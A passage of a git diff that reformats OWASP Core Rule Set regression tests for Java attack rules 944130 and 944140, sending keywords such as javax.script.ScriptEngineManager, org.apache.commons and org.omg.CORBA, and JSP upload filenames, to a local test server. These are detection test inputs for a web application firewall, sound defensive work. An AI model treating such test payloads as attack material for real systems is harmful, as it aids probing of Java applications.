"en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"javax.script.ScriptEngineManager\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-396 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"javax.script.ScriptEngineManager\"}" + output: + log: + expect_ids: [944130] + - test_id: 396 desc: "Content-Type application/json arg name includes keyword javax.script.ScriptEngineManager" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"javax.script.ScriptEngineManager\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-397 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"javax.script.ScriptEngineManager\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 397 desc: "Argument test includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: 
- Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-398 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log: + expect_ids: [944130] + - test_id: 398 desc: "Argument name includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.apache.commons=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-399 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.apache.commons=test" + output: + log: + expect_ids: [944130] 
+ - test_id: 399 desc: "Cookie test includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=org.apache.commons - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-400 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.apache.commons + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 400 desc: "Cookie name includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: org.apache.commons=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-401 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.apache.commons=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 401 desc: "Request header test includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: org.apache.commons - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-402 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.apache.commons + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 402 desc: "XML attribute value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-403 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 403 desc: "XML element value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-404 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log: + expect_ids: [944130] + - test_id: 404 desc: "Nested XML element value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-405 + - input: 
+ dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.apache.commons" + output: + log: + expect_ids: [944130] + - test_id: 405 desc: "Content-Type text/plain includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.apache.commons" - output: - log_contains: "id \"944130\"" - - test_title: 944130-406 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.apache.commons" + output: + log: + expect_ids: [944130] + - test_id: 406 desc: "Content-Type application/json arg value includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"{\"test\": \"org.apache.commons\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-407 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"org.apache.commons\"}" + output: + log: + expect_ids: [944130] + - test_id: 407 desc: "Content-Type application/json arg name includes keyword org.apache.commons" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"org.apache.commons\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-408 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"org.apache.commons\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 408 desc: "Argument test includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-409 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log: + expect_ids: [944130] + - test_id: 409 desc: "Argument name includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.omg.CORBA=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-410 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.omg.CORBA=test" + output: + log: + expect_ids: [944130] + - test_id: 410 desc: "Cookie test includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=org.omg.CORBA - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-411 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=org.omg.CORBA + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 411 desc: "Cookie name includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: org.omg.CORBA=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-412 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: org.omg.CORBA=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - 
test_id: 412 desc: "Request header test includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: org.omg.CORBA - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-413 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: org.omg.CORBA + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 413 desc: "XML attribute value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-414 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + 
method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 414 desc: "XML element value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-415 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log: + expect_ids: [944130] + - test_id: 415 desc: "Nested XML element value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-416 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "org.omg.CORBA" + output: + log: + expect_ids: [944130] + - test_id: 416 desc: "Content-Type text/plain includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=org.omg.CORBA" - output: - log_contains: "id \"944130\"" - - test_title: 944130-417 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=org.omg.CORBA" + output: + log: + expect_ids: [944130] + - test_id: 417 desc: "Content-Type application/json arg value includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"org.omg.CORBA\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-418 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"org.omg.CORBA\"}" + output: + log: + expect_ids: [944130] + - test_id: 418 desc: "Content-Type application/json arg name includes keyword org.omg.CORBA" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"org.omg.CORBA\": \"test\"}" - output: - log_contains: "id \"944130\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"org.omg.CORBA\": \"test\"}" + output: + log: + expect_ids: [944130] diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml index d380970c8..a1f312d84 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml 
@@ -1,159 +1,157 @@ --- meta: author: "lifeforms, azurit" - description: None - enabled: true - name: 944140.yaml +rule_id: 944140 tests: - - test_title: 944140-1 + - test_id: 1 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "944140" - - test_title: 944140-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [944140] + - test_id: 2 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-Filename: a.jsp - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload1" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jsp + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload1" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 3 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X_Filename: B.jsp - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload2" - version: "HTTP/1.1" - 
output: - log_contains: id "944140" - - test_title: 944140-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X_Filename: B.jsp + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload2" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 4 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-File-Name: a.jspx - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload3" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-File-Name: a.jspx + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + port: 80 + method: "GET" + uri: "/get/upload3" + version: "HTTP/1.1" + output: + log: + expect_ids: [944140] + - test_id: 5 desc: Java script uploads stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - X-Filename: a.jsp.. - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - port: 80 - method: "GET" - uri: "/get/upload4" - version: "HTTP/1.1" - output: - log_contains: id "944140" - - test_title: 944140-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + X-Filename: a.jsp.. 
